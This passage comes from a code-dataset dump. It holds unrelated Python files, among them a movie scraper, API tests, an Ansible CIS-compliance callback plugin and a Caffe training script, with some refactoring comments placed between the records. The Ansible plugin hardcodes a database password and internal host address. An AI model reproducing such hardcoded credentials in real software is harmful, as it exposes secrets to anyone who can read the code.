unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(_slugify_strip_re.sub('', value).strip().lower())\n return _slugify_hyphenate_re.sub('-', value)\n","sub_path":"calloncongress/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"396986738","text":"#!/usr/bin/python3\n\"\"\" Contains function that 
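bill_type_for and bill_number_for above both lean on re.split with a capturing group, reading parts[1] (the alphabetic prefix) and parts[2] (the remainder). Note the module is Python 2 era (slugify uses unicode); on Python 3.7+ zero-width matches change re.split's output, so a version-safe equivalent is a single re.match. A short sketch with made-up inputs:

import re

def split_bill(abbr):
    # Version-safe equivalent of the re.split(r'([a-zA-Z.\-]*)', ...)
    # indexing used by bill_type_for and bill_number_for above.
    m = re.match(r'([a-zA-Z.\-]*)(.*)', abbr)
    prefix = m.group(1).lower().replace('.', '')
    return prefix, m.group(2)

assert split_bill('H.R.3590') == ('hr', '3590')
assert split_bill('sres15') == ('sres', '15')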
returns a list of integer lists\n    representing Pascal's triangle of n \"\"\"\n\n\ndef pascal_triangle(n):\n    if n <= 0:\n        return []\n\n    tri = []\n    for row in range(n):\n        tri.append([1])\n        for i in range(1, row):\n            tri[row].append(tri[row - 1][i - 1] + tri[row - 1][i])\n        if row != 0:\n            tri[row].append(1)\n    return tri\n","sub_path":"0x0B-python-input_output/14-pascal_triangle.py","file_name":"14-pascal_triangle.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"142073659","text":"#A-T\r\n#G-C\r\n\r\n\r\ndef main(arr):\r\n    for i in arr:\r\n        if i=='A':\r\n            i='T'\r\n        elif i=='a':\r\n            i='t'\r\n        elif i=='G':\r\n            i='C'\r\n        elif i=='g':\r\n            i='c'\r\n        elif i=='T':\r\n            i='A'\r\n        elif i=='t':\r\n            i='a'\r\n        elif i=='C':\r\n            i='G'\r\n        elif i=='c':\r\n            i='g'\r\n        print(i,end=\"\")\r\n\r\nif __name__==\"__main__\":\r\n    n=int(input(\"Enter the length of the string:\"))\r\n    x = [str(input(\"Enter the string:\")) for j in range(n)]\r\n    print(\"Original String:\",str(x))\r\n    y = x[::-1]\r\n    print(\"Final output:\")\r\n    main(y)\r\n","sub_path":"Necleotide Sequence.py","file_name":"Necleotide Sequence.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"492769124","text":"# CS60012 A8\n# task1\n# Ravi Pratap Singh (20CS60R60)\n\nimport urllib.request, urllib.error, urllib.parse\nimport os\nimport codecs\nimport re\nimport sys\n\ndef main():\n\t#getting links from text files\n\tif not os.path.exists(\"./HTML\"):\n\t\tos.mkdir(\"./HTML\")\n\tinputFileName = \"rotten tomatoes movie genre link.txt\"\n\twith open(inputFileName) as f:\n\t\tcontent = f.readlines()\n\tcontent = [x.strip() for x in content]\n\tgenre_name=\"\"\n\tgenre_dict = {}\n\tfor url in content:\n\t\tif url.endswith(\"/\"):\n\t\t\tgenre_dict[genre_name] = url\n\t\telif url[0].isnumeric():\n\t\t\ttemp=url.split(\".\")\n\t\t\tgenre_name=temp[1][:-1].strip()\n\t\telse:\n\t\t\tcontinue\n\n\t#prompt user to enter genre\n\twhile True:\n\t\tprint(\"Genre list:\")\n\t\tfor g in genre_dict.keys():\n\t\t\tprint(g)\n\t\tgenre = str(input(\"Enter the genre(case sensitive): \"))\n\t\tgenre_path = \"./HTML/\" + genre + \".html\"\n\t\tif not os.path.isfile(genre_path):\n\t\t\tprint(f'Fetching web page: {genre_dict[genre]}')\n\t\t\tresponse = urllib.request.urlopen(genre_dict[genre])\n\t\t\twebContent = response.read()\n\t\t\tf = open(genre_path, 'wb')\n\t\t\tf.write(webContent)\n\t\t\tf.close()\n\n\t\tf=codecs.open(genre_path, mode=\"r\")\n\t\ts=f.read()\n\t\tall_urls={}\n\n\t\t#regex for getting top 100 movies\n\t\tregex = r\"\\ba\\shref=\\\"\\/m\\/\\b([a-zA-Z0-9\\-_]+)\\\"\\sclass=\\\"unstyled articleLink\\\">[^\\\\n*]\\s*([a-zA-Z0-9.,:\\-()ÄÖÜäöüâÂôÔêÊ[^\\'\\\"\\s+]+]*)\"\n\t\tmatches = re.finditer(regex, s, re.MULTILINE)\n\n\t\t#printing top 100 movies\n\t\tfor matchNum, match in enumerate(matches, start=1):\n\t\t\tall_urls[match.group(2)] = match.group(1)\n\t\tfor key in all_urls.keys():\n\t\t\tprint(key)\n\n\t\t#prompt user to enter movie name\n\t\twhile True:\n\t\t\tmov = input(\"SELECT MOVIE FROM THE ABOVE LIST(case sensitive):\")\n\t\t\tif not os.path.exists(\"./MOVIE\"):\n\t\t\t\tos.mkdir(\"./MOVIE\")\n\n\t\t\tmov_url = \"https://www.rottentomatoes.com/m/\" + str(all_urls[mov])\n\t\t\tprint(f'Fetching web page: {mov_url}')\n\t\t\ttry:\n\t\t\t\tresponse_mov = 
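The nucleotide script above implements the base-complement map with an if/elif chain; Python's str.translate does the same mapping in one call, and slicing with [::-1] gives the reverse complement. A sketch, assuming plain A/T/G/C input with case preserved as in the original:

# Complement table covering both cases, as in the if/elif chain above.
COMPLEMENT = str.maketrans('ATGCatgc', 'TACGtacg')

def reverse_complement(seq):
    return seq.translate(COMPLEMENT)[::-1]

assert reverse_complement('ATGc') == 'gCAT'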
urllib.request.urlopen(mov_url)\n\t\t\t\twebContent_mov = response_mov.read()\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\t\t\t\tcontinue\t\t\t\n\t\t\tmov_name = \"./MOVIE/\" + genre + \";\" + mov + \".html\"\n\t\t\tf = open(mov_name, 'wb')\n\t\t\tf.write(webContent_mov)\n\t\t\tf.close()\n\t\t\tprint(\"Downloaded Movie \",mov,\" of \",genre)\n\t\t\twant = input(\"Want to continue on same genre (y/n)> \")\n\t\t\tif(want == 'y'):\n\t\t\t\tcontinue\n\t\t\telif(want == 'n'):\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"Enter valid code\")\n\t\t\t\tsys.exit(10)\n\t\twant2 = input(\"Want to continue more (y/n)> \")\n\t\tif(want2 == 'y'):\n\t\t\tcontinue\n\t\telif(want2 == 'n'):\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"Enter valid code\")\n\t\t\tsys.exit(10)\n\nif __name__==\"__main__\":\n\tmain()","sub_path":"A8/A8_20CS60R60/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"9278026","text":"import allure\nfrom config import helpers\n\n\n@allure.feature(\"Check Post is Liked\")\n@allure.story(\"Like post and check it is liked\")\ndef test_like_post_and_check_liked(get_post_id):\n liked = 1\n post_id = get_post_id\n helpers.send_request('/likes.add', item_id=post_id)\n result = helpers.send_request('/likes.isLiked', item_id=post_id)\n with allure.step(\"Post is in Liked for user\"):\n assert helpers.check_response(result)['liked'] == liked, \\\n f\"Post is not in liked. Result: {result}\"\n\n\n@allure.feature(\"Check Post is Liked\")\n@allure.story(\"Check if post is liked with wrong user id\")\ndef test_liked_for_user_with_wrong_id(get_post_id):\n wrong_id = 12112342\n post_id = get_post_id\n result = helpers.send_request('/likes.isLiked', item_id=post_id, user_id=wrong_id, owner_id=wrong_id)\n with allure.step(\"Access denied error\"):\n assert 'Access denied' in helpers.check_error(result)['error_msg'], \\\n f\"Error message is incorrect. 
Result: {result}\"\n","sub_path":"tests/test_likes_is_liked.py","file_name":"test_likes_is_liked.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"123029236","text":"# problem one\n\n\ndef get_lines_from_input_file(filename):\n rows = []\n with open(filename) as f:\n for line in f:\n rows.append(line)\n\n return rows\n\n\ndef find_answers(rows):\n answer = 0\n for element in rows:\n operator = element[0]\n value = element[1:]\n if operator == \"+\":\n answer += int(value)\n elif operator == \"-\":\n answer -= int(value)\n else:\n print(operator, value)\n return answer\n\n\ndef main():\n print(find_answers(get_lines_from_input_file('input_1.txt')))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2018/Problem 1/problem_1_frequency_delays.py","file_name":"problem_1_frequency_delays.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"648194431","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nimport os\nimport time\nimport json\nimport socket\nimport psycopg2\nimport logging\nimport math\nimport jinja2\nimport re\nimport sys\n\nfrom ansible import context\nfrom json import JSONEncoder\nfrom ansible.utils.path import makedirs_safe\nfrom ansible.module_utils._text import to_bytes\nfrom ansible.module_utils.common._collections_compat import MutableMapping\nfrom ansible.module_utils.basic import get_distribution, get_exception\nfrom ansible.parsing.ajson import AnsibleJSONEncoder\nfrom ansible.plugins.callback import CallbackBase\nfrom datetime import datetime\n\nclass Host:\n def __init__(self):\n self.distribution = \"\"\n self.distribution_version = \"\"\n self.distribution_major_version = \"\"\n self.os_family = \"\"\n self.hostname = \"\"\n self.ipv4 = \"\"\n self.tasks = {}\n self.is_audit = True\n\nclass Task:\n def __init__(self):\n self.rule = \"\"\n self.section = \"\"\n self.scored = \"\"\n self.level = \"\"\n self.profiles = []\n self.headings = {}\n self.rules = {}\n self.status = \"\"\n #self.isManual = False\n \nclass Heading:\n def __init__(self):\n self.rule = \"\"\n self.section = \"\"\n\nclass Rule:\n def __init__(self):\n self.section = \"\"\n self.description = \"\"\n self.info = \"\"\n self.output = \"\"\n self.state = \"\"\n\nclass CISEncoder(JSONEncoder):\n def default(self, o):\n return o.__dict__\n\n# ==========================================================\n\nclass CallbackModule(CallbackBase):\n CALLBACK_VERSION = 2.0\n my_objects = []\n\n TIME_FORMAT = \"%b %d %Y %H:%M:%S\"\n MSG_FORMAT = \"%(now)s - %(category)s - %(data)s\\n\\n\"\n\n def __init__(self):\n self.disabled = False\n super(CallbackModule, self).__init__() \n self._options = context.CLIARGS\n \n self.is_remediate = False\n self.last_task_name = None\n self.playbook_name = None\n self._play = \"\"\n self.node_task_result = {}\n self.check_mode = False\n self.transaction_per_node = {}\n self.tags = []\n self.tasks_per_host = {}\n\n self.logger = logging.getLogger(__name__)\n self.logger.setLevel(logging.DEBUG)\n self.ignore_tag = \"\"\n\n # create a file handler \n output_file_handler = logging.FileHandler(\"/home/ubuntu/automation/output/output.log\", 'w')\n stdout_handler = logging.StreamHandler(sys.stdout)\n\n # create a logging format\n #formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n 
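Since int() already accepts a leading '+' or '-', the operator dispatch in find_answers above can collapse to a single sum over the file. A sketch with the same input file name:

def find_answers(filename):
    # int('+5') == 5 and int('-3') == -3, so no manual dispatch is needed.
    with open(filename) as f:
        return sum(int(line) for line in f if line.strip())

print(find_answers('input_1.txt'))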
#output_file_handler.setFormatter(formatter)\n #stdout_handler.setFormatter(formatter)\n\n # add the file handler to the logger\n self.logger.addHandler(output_file_handler)\n self.logger.addHandler(stdout_handler)\n\n self.start_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S') \n\n def _all_vars(self, host=None, task=None):\n return self._play.get_variable_manager().get_vars(\n play=self._play,\n host=host,\n task=task\n )\n\n\n def log(self, result, category):\n #self.logger.debug(\"************************************************\")\n self.logger.debug(\"Task>: %s\", self.last_task_name)\n self.logger.debug(\"Status>: %s\", category)\n #print(\"ignore_tag: {0}\".format(self.ignore_tag))\n\n if category == \"OK\" or category == \"CHANGED\":\n self.logger.debug(\"Valid Task\")\n else:\n self.logger.debug(\"Ignored task\")\n return\n\n #if self.ignore_tag == \"HANDLER\":\n # self.logger.debug(\"ERRORRRRRRRRRRR\")\n\n host_name = result._host.get_name()\n \n if('moveit' in result._result):\n #if len(self.tags) > 0 and (\"AUDIT\" in self.tags or \"REMEDIATE\" in self.tags) and self.ignore_tag != \"HANDLER\":\n print(\"Inside\")\n values = self.last_task_name.split(\"|\")\n main_section = values[0]\n main_rule = values [1]\n \n task = Task()\n task.rule = main_rule\n task.section = main_section\n\n main_scored = \"NA\"\n if \"not_scored\" in self.tags:\n main_scored = \"Not Scored\"\n elif \"scored\" in self.tags:\n main_scored = \"Scored\"\n else:\n main_scored = \"NA\"\n task.scored = main_scored\n task.level = len(main_section.split(\".\")) - 1\n\n profiles = []\n task.profiles = profiles\n if \"Level1_Workstation\" in self.tags:\n profiles.append(\"Level1_Workstation\")\n if \"Level2_Workstation\" in self.tags:\n profiles.append(\"Level2_Workstation\")\n if \"Level1_Server\" in self.tags:\n profiles.append(\"Level1_Server\")\n if \"Level2_Server\" in self.tags:\n profiles.append(\"Level2_Server\") \n \n headings = {}\n task.headings = headings\n for tag in self.tags: \n if \"|\" in tag:\n values = tag.split(\"|\")\n \n heading = Heading()\n heading_section = values[0] \n heading.section = heading_section\n heading.rule = values[1]\n heading.level = len(heading_section.split(\".\")) - 1\n headings[heading_section] = heading \n\n rule = Rule()\n if('moveit' in result._result):\n output = result._result['moveit']\n rule.section = output['section']\n rule.description = output['description']\n rule.info = output['info']\n rule.output = output['cmd_output']\n rule.state = output['state']\n #rule.isManual = output['isManual']\n \n self.logger.debug(\"Current Status: %s\", output['state'])\n\n host_result = self.tasks_per_host[host_name]\n # host_result.is_audit = is_audit\n host_result_tasks = host_result.tasks\n\n if main_section in host_result_tasks:\n primary_task = host_result_tasks[main_section]\n rules = primary_task.rules\n rules[len(rules)] = rule\n\n status = []\n for rule in rules:\n status.append(rules[rule].state)\n\n if \"manual\" in status:\n primary_task.status = \"manual\"\n elif \"failed\" in status:\n primary_task.status = \"failed\"\n elif \"changed\" in status:\n primary_task.status = \"changed\"\n elif \"passed\" in status:\n primary_task.status = \"passed\"\n else:\n primary_task.status = \"error\"\n\n if category == \"FAILED\":\n primary_task.status = \"error\"\n\n # for rule in rules:\n # if rules[rule].isManual:\n # primary_task.isManual = True\n # break\n\n self.logger.debug(\"StatusIF: %s\", status)\n\n else:\n self.logger.debug(\"StatusElse: %s\", rule.state)\n if 
category == \"FAILED\":\n task.status = \"error\" \n # task.isManual = rule.isManual\n task.status = rule.state \n task.rules[0] = rule\n host_result_tasks[main_section] = task\n\n self.logger.debug('**************** END OF TASK *******************')\n\n def set_options(self, task_keys=None, var_options=None, direct=None):\n super(CallbackModule, self).set_options(task_keys=task_keys, var_options=var_options, direct=direct)\n\n def create_host(self, result):\n host_name = result._host.get_name()\n\n if host_name not in self.tasks_per_host:\n hostname = self._all_vars()['hostvars'][host_name][\"ansible_hostname\"]\n ipv4 = self._all_vars()['hostvars'][host_name][\"ansible_default_ipv4\"][\"address\"]\n distribution = self._all_vars()['hostvars'][host_name][\"ansible_distribution\"]\n distribution_major_version = self._all_vars()['hostvars'][host_name][\"ansible_distribution_major_version\"]\n distribution_version = self._all_vars()['hostvars'][host_name][\"ansible_distribution_version\"]\n os_family = \"\"\n tags = self._options['tags']\n \n # os_family = distribution_version + \" \" + distribution_version\n linux_family = self._all_vars()['vars']['linux']\n windows_family = self._all_vars()['vars']['windows']\n\n is_linux = distribution in linux_family\n is_windows = distribution in windows_family\n\n if is_linux:\n os_family = \"LINUX\"\n elif is_windows:\n os_family = \"WINDOWS\"\n else:\n os_family = \"UNKNOWN\"\n\n host = Host()\n host.distribution = distribution\n host.distribution_major_version = distribution_major_version\n host.distribution_version = distribution_version\n host.os_family = os_family\n host.hostname = hostname\n host.ipv4 = ipv4\n if 'REMEDIATE' in tags:\n host.is_audit = True\n else:\n host.is_audit = False\n\n self.tasks_per_host[host_name] = host \n\n def v2_playbook_on_handler_task_start(self, task): \n self.ignore_tag = \"HANDLER\"\n pass\n\n def v2_runner_on_ok(self, result, **kwargs):\n tags = result._task.tags \n\n changed = ('changed' in result._result and result._result['changed'])\n ok_or_changed = 'OK'\n\n if changed:\n ok_or_changed = 'CHANGED' # TODO testing purpose, neeed to remove later\n\n self.create_host(result)\n\n if ('redhat_version' in tags): \n host_name = result._host.get_name()\n host = self.tasks_per_host[host_name] \n host.distribution = result._result['stdout'] \n self.log(result, ok_or_changed)\n\n def v2_runner_on_failed(self, result, ignore_errors=False):\n self.create_host(result)\n print(\"ERROR\")\n self.log(result, 'FAILED')\n\n def v2_runner_on_skipped(self, result, ignore_errors=False):\n self.create_host(result)\n self.log(result, 'SKIPPED')\n\n def v2_runner_item_on_skipped(self, result, ignore_errors=False):\n self.create_host(result)\n self.log(result, 'SKIPPED')\n\n def v2_runner_on_unreachable(self, result):\n self.create_host(result)\n self.log(result, 'UNREACHABLE')\n\n def v2_runner_on_async_failed(self, result):\n self.create_host(result)\n print(\"ERROR\")\n self.log(result, 'ASYNC_FAILED')\n\n\n def v2_playbook_on_task_start(self, task, **kwargs):\n self.last_task_name = task.get_name()\n #self.tags = task._attributes['tags']\n self.is_remediate = self._all_vars()['vars']['is_remediate']\n self.tags = task.tags\n\n def playbook_on_setup(self):\n #print(\"\\n{0}\".format('GATHERING FACTS'))\n pass\n\n def set_play_context(self, play_context):\n self.play_context = play_context\n\n def v2_playbook_on_play_start(self, play):\n self._play = play\n playbook = self._all_vars()['vars']['playbook_dir']\n\n index = 
playbook.rfind('/')+1\n\n self.playbook_name = playbook[index:]\n if self.play_context.check_mode:\n self.check_mode = True\n\n\n def playbook_on_import_for_host(self, host, imported_file):\n pass\n\n def playbook_on_not_import_for_host(self, host, missing_file):\n pass\n\n def v2_playbook_on_start(self, playbook):\n pass\n\n def v2_playbook_on_stats(self, stats): \n \"\"\"Complete: Flush log to database\"\"\"\n hosts = stats.processed.keys()\n\n # print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>\") \n \n cisJSONData = json.dumps(self.tasks_per_host, indent=4, cls=CISEncoder)\n self.html_generator(cisJSONData)\n # self.logger.info('Return result: \\n%s', cisJSONData)\n\n # print(\"------------------------------------------------\")\n\n for h in hosts:\n t = stats.summarize(h)\n msg = \"Host: %s, ok: %d, failures: %d, unreachable: %d, changed: %d, skipped: %d\" % (\n h, t['ok'], t['failures'], t['unreachable'], t['changed'], t['skipped'])\n print(\"\\n{0}\".format(msg))\n\n #self.flush_to_database(hosts, is_compliant)\n self.logger.debug(\"============= Completed Successfully =============\")\n\n def html_generator(self, cisJSONData):\n self.logger.debug(\"Generating report....\")\n data = json.loads(cisJSONData)\n\n for host in data:\n list_body = []\n tasks = data[host][\"tasks\"]\n is_remediate = self.is_remediate # TODO\n \n pass_count = 0\n fail_count = 0 \n error_count = 0\n changed_count = 0\n manual_count = 0\n\n\n for i in tasks:\n rules = tasks[i][\"rules\"]\n status = tasks[i][\"status\"]\n #isManual = tasks[i][\"isManual\"]\n scored = tasks[i][\"scored\"]\n profile = tasks[i][\"profiles\"]\n\n for j in rules:\n rule = rules[j]\n list_body.append(rule[\"section\"])\n list_body.append(rule[\"description\"] + \" (\" + scored + \")\" )\n list_body.append(rule[\"info\"])\n list_body.append(rule[\"state\"])\n list_body.append(status)\n self.logger.debug(\"Task: %s, Status: %s\",rule[\"section\"], rule[\"state\"])\n \n if status == \"passed\":\n pass_count += 1\n elif status == \"failed\":\n fail_count += 1\n elif status == \"changed\":\n changed_count += 1\n elif status == \"manual\":\n manual_count += 1\n else:\n error_count += 1\n\n list_body.append(rule[\"output\"])\n list_body.append(profile)\n\n # if isManual:\n # manual_count += 1\n # list_body.append(\"manual\")\n # else:\n # list_body.append(\"not-manual\")\n\n # pass_count = list_body.count(\"Compliant\")\n # fail_count = list_body.count(\"Non-compliant\")\n # error_count = list_body.count(\"Error\")\n # manual_count = list_body.count(\"Manual\")\n\n total = pass_count + fail_count + error_count + changed_count\n compliant_count = pass_count + manual_count\n non_compliant_count = fail_count + error_count\n percentageVal = math.floor((compliant_count/total)*100)\n percentage = str(percentageVal)+'%'\n status = \"\"\n if percentageVal == 100:\n status += \"Passed\"\n else:\n status += \"Failed\"\n\n i = 0\n list_of_lists = []\n while i < len(list_body):\n list_of_lists.append(list_body[i:i+7])\n i += 7\n\n templateFile = \"template.html\"\n script_path = os.path.dirname(os.path.abspath(__file__))\n environment = jinja2.Environment(loader=jinja2.FileSystemLoader(script_path))\n\n template = environment.get_template(templateFile)\n html = template.render(machine_hostname=data[host][\"hostname\"], \n machine_ip_address=data[host][\"ipv4\"], \n machine_distro=data[host][\"distribution\"], \n machine_time=self.start_time, \n machine_number_of_policies=total, \n machine_compliant=compliant_count, \n machine_non_compliant=non_compliant_count, \n 
machine_compliance_rate=percentage, \n machine_status=status, \n machine_manual=manual_count,\n table_items=list_of_lists,\n is_remediate=is_remediate)\n fileName = data[host][\"hostname\"]\n fileName = fileName + \"_remediate\" if is_remediate else fileName + \"_audit\"\n self.logger.debug(fileName)\n with open(\"/home/ubuntu/automation/output/\"+fileName + \"_report.html\", \"w\") as report:\n report.write(html)\n\n def flush_to_database(self, hosts, is_compliant):\n connection = psycopg2.connect(\n host='10.10.14.10', database='automation', user='postgres', password='P@ssw0rd')\n cursor = connection.cursor()\n print(\"Playbook: {}\".format(self.playbook_name))\n playbook_name = self.playbook_name\n # PLAYBOOK\n sql_select_query_for_play = 'SELECT id FROM playbook WHERE name=%s'\n cursor.execute(sql_select_query_for_play, (playbook_name,))\n playbook_id = cursor.fetchone()[0]\n print(\"Playbook ID: {0}\".format(playbook_id))\n\n #HISTORY\n sql_insert_query_for_run_history = 'INSERT INTO run_history (playbook_id, run_date) VALUES (%s, now()) RETURNING id'\n cursor.execute(sql_insert_query_for_run_history, (playbook_id,))\n history_id = cursor.fetchone()[0]\n print(\"History ID:::: {0}\".format(history_id))\n\n for h in hosts:\n remote_node = self.node_task_result[h]\n ruleNodes = remote_node.rule_node # set of section_rules\n distribution = remote_node.distribution\n distribution_version = remote_node.distribution_version\n distribution_major_version = remote_node.distribution_major_version\n print(\"\\ndistribution: {0}\".format(distribution))\n print(\"\\ndistribution_version: {0}\".format(distribution_version))\n print(\"\\ndistribution_major_version: {0}\".format(distribution_major_version))\n\n # OS\n sql_select_query_for_os_id = 'INSERT INTO os(playbook_id, distribution, distribution_version, distribution_major_version, os_family) values (%s, %s, %s, %s, %s) ON CONFLICT (distribution, os_family) DO UPDATE SET distribution = EXCLUDED.distribution RETURNING id' \n cursor.execute(sql_select_query_for_os_id, (playbook_id, remote_node.distribution, remote_node.distribution_version, remote_node.distribution_major_version, remote_node.os_family,))\n os_id = cursor.fetchone()[0]\n print(\"OS ID:::: {0}\".format(os_id))\n print(\"HostName: {0}\".format(remote_node.hostname))\n print(\"IPV4: {0}\".format(remote_node.ipv4))\n\n # MACHINE\n sql_select_query_for_machine_id = 'INSERT INTO machine(os_id, hostname, ipv4) VALUES (%s, %s, %s) ON CONFLICT (os_id, hostname, ipv4) DO UPDATE SET hostname = EXCLUDED.hostname RETURNING id'\n cursor.execute(sql_select_query_for_machine_id, (os_id, remote_node.hostname, remote_node.ipv4,))\n machine_id = cursor.fetchone()[0]\n print(\"Machine ID:::: {0}\".format(machine_id))\n\n #RUN_HISTORY\n sql_insert_query_for_machine_run_history = 'INSERT INTO machine_run_history (history_id, machine_id) VALUES (%s, %s)'\n cursor.execute(sql_insert_query_for_machine_run_history, (history_id, machine_id,))\n\n for ruleNode in ruleNodes: \n taskNodes = ruleNode.task_node\n status = ruleNode.status\n parent_id = 0\n\n for section in sorted(taskNodes.keys()):\n rule = taskNodes[section] \n\n # RULES\n sql_select_query_for_rule_id = 'INSERT INTO compliance_rule(playbook_id, parent_id, rule, is_scored, level, expcted_value, profile1, profile2, section) VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s) ON CONFLICT (playbook_id, rule, section) DO UPDATE SET rule = EXCLUDED.rule RETURNING id' \n cursor.execute(sql_select_query_for_rule_id, (playbook_id, parent_id, rule.rule, 
rule.scored, rule.level, \"NA\", rule.profile1, rule.profile2, section,))\n rule_id = cursor.fetchone()[0]\n\n if parent_id == 0:\n sql_update_query_for_compliance_rule = 'UPDATE compliance_rule SET parent_id=%s WHERE id=%s'\n cursor.execute(sql_update_query_for_compliance_rule, (rule_id, rule_id,))\n\n if rule.level != 0:\n parent_id = rule_id\n\n is_compliant = 'Compliant' if status in [\"OK\", \"CHANGED\", \"SKIPPED\"] else 'Non-Compliant'\n # MACHINE COMPLIANCE RULE\n print(\"historyID: {0}, ruleID: {1}, status: {2}\".format(history_id, rule_id, status))\n sql_insert_query_for_run_machine_compliance_rule = 'INSERT INTO machine_compliance_rule (history_id, compliance_rule_id, status, is_compliant) VALUES (%s, %s, %s, %s) RETURNING id'\n cursor.execute(sql_insert_query_for_run_machine_compliance_rule, (history_id, rule_id, status, is_compliant,))\n \n connection.commit()\n connection.close()\n","sub_path":"RHEL8/callback_plugins/callbackScripts.py","file_name":"callbackScripts.py","file_ext":"py","file_size_in_byte":21567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"436777428","text":"import pytest\n\nimport src.sound.utils as utils\nfrom src.sound import SoundGroup\n\n\nclass TestGetSoundRootDirectory:\n @pytest.fixture\n def example_group(self):\n group_config = {\"name\": \"Group 1\", \"sounds\": [{\"name\": \"Sound 1\", \"files\": [\"sound_1.wav\"]}]}\n return SoundGroup(group_config)\n\n def test_get_sound_root_directory_returns_global_directory(self, example_group):\n \"\"\"\n If a directory is specified at the default level and no other level, return the default directory.\n \"\"\"\n example_group.directory = None\n sound = example_group.sounds[0]\n sound.directory = None\n directory = utils.get_sound_root_directory(group=example_group, sound=sound, default_dir=\"default/dir\")\n assert directory == \"default/dir\"\n\n def test_get_sound_root_directory_returns_group_directory(self, example_group):\n \"\"\"\n When a directory is specified for a SoundGroup and no directory is specified for the Sound, the\n group directory should be returned (not the default directory).\n \"\"\"\n example_group.directory = \"group/dir\"\n sound = example_group.sounds[0]\n sound.directory = None\n directory = utils.get_sound_root_directory(group=example_group, sound=sound, default_dir=\"default/dir\")\n assert directory == \"group/dir\"\n\n def test_get_sound_root_directory_returns_sound_directory(self, example_group):\n \"\"\"\n When a directory is specified for a Sound, it should be returned (not the default or group directory).\n \"\"\"\n example_group.directory = \"group/dir\"\n sound = example_group.sounds[0]\n sound.directory = \"sound/dir\"\n directory = utils.get_sound_root_directory(group=example_group, sound=sound, default_dir=\"default/dir\")\n assert directory == \"sound/dir\"\n\n def test_get_sound_root_directory_raises_value_error_if_no_directory_on_any_level(self, example_group):\n \"\"\"\n If no directory is specified at all (neither the default, group or sound level), then raise a ValueError.\n \"\"\"\n example_group.directory = None\n sound = example_group.sounds[0]\n sound.directory = None\n with pytest.raises(ValueError):\n utils.get_sound_root_directory(group=example_group, sound=sound, default_dir=None)\n\n\nclass TestSoundTupleGenerator:\n def test_sound_tuple_generator(self):\n \"\"\"\n Test that calling `sound_tuple_generator()` returns an iterator over all tuples of the form\n (group, sound, sound_file).\n \"\"\"\n 
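flush_to_database above opens a raw connection and commits once at the very end, so a failure midway leaves a half-written transaction to roll back manually. psycopg2 connections are also context managers that commit on clean exit and roll back on exception; a sketch of the same upsert shape under that pattern (table, unique constraint, and credentials are placeholders):

import psycopg2

def upsert_playbook(conn_params, name):
    # 'with connection' commits on success and rolls back on error;
    # 'with cursor' closes the cursor afterwards.
    with psycopg2.connect(**conn_params) as connection:
        with connection.cursor() as cursor:
            cursor.execute(
                'INSERT INTO playbook (name) VALUES (%s) '
                'ON CONFLICT (name) DO UPDATE SET name = EXCLUDED.name '
                'RETURNING id',
                (name,),
            )
            return cursor.fetchone()[0]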
group_config = {\n \"name\": \"Group 1\",\n \"sounds\": [\n {\"name\": \"Sound 1\", \"files\": [\"sound_file_1.wav\"]},\n {\"name\": \"Sound 2\", \"files\": [\"sound_file_2.wav\", \"sound_file_3.wav\"]},\n ],\n }\n groups = [SoundGroup(group_config)]\n generator = utils.sound_tuple_generator(groups)\n first_tuple = (groups[0], groups[0].sounds[0], groups[0].sounds[0].files[0])\n second_tuple = (groups[0], groups[0].sounds[1], groups[0].sounds[1].files[0])\n third_tuple = (groups[0], groups[0].sounds[1], groups[0].sounds[1].files[1])\n assert first_tuple == next(generator)\n assert second_tuple == next(generator)\n assert third_tuple == next(generator)\n with pytest.raises(StopIteration):\n next(generator)\n","sub_path":"tests/test_sound/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"374803106","text":"caffe_root = '../caffe/' # this file should be run from {caffe_root}/examples (otherwise change this line)\r\nimport cv2\r\nimport sys\r\nsys.path.insert(0, caffe_root + 'python')\r\nimport caffe\r\nimport math\r\nimport getopt\r\ncaffe.set_device(0)\r\ncaffe.set_mode_gpu()\r\n\r\nimport os\r\nimport numpy as np\r\nfrom pylab import *\r\nimport tempfile\r\nfrom caffe.proto import caffe_pb2\r\nfrom caffe import layers as L, params as P\r\n\r\ndef run_solvers(niter, solvers):\r\n \"\"\"Run solvers for niter iterations,\r\n returning the loss and accuracy recorded each iteration.\r\n `solvers` is a solver\"\"\"\r\n \r\n loss = np.zeros(niter) \r\n \r\n s=solvers\r\n for it in range(niter):\r\n s.step(1) # run a single SGD step in Caffe\r\n loss[it]= s.net.blobs['loss'].data.copy()\r\n \r\n # weight_dir = tempfile.mkdtemp()\r\n filename = 'weights.caffemodel' \r\n weights= os.path.join(filename)\r\n s.net.save(weights)\r\n return loss, weights\r\ndef solver(train_net_path,test_net_path=None, base_lr=0.001):\r\n s = caffe_pb2.SolverParameter()\r\n\r\n # Specify locations of the train and (maybe) test networks.\r\n s.train_net =train_net_path\r\n 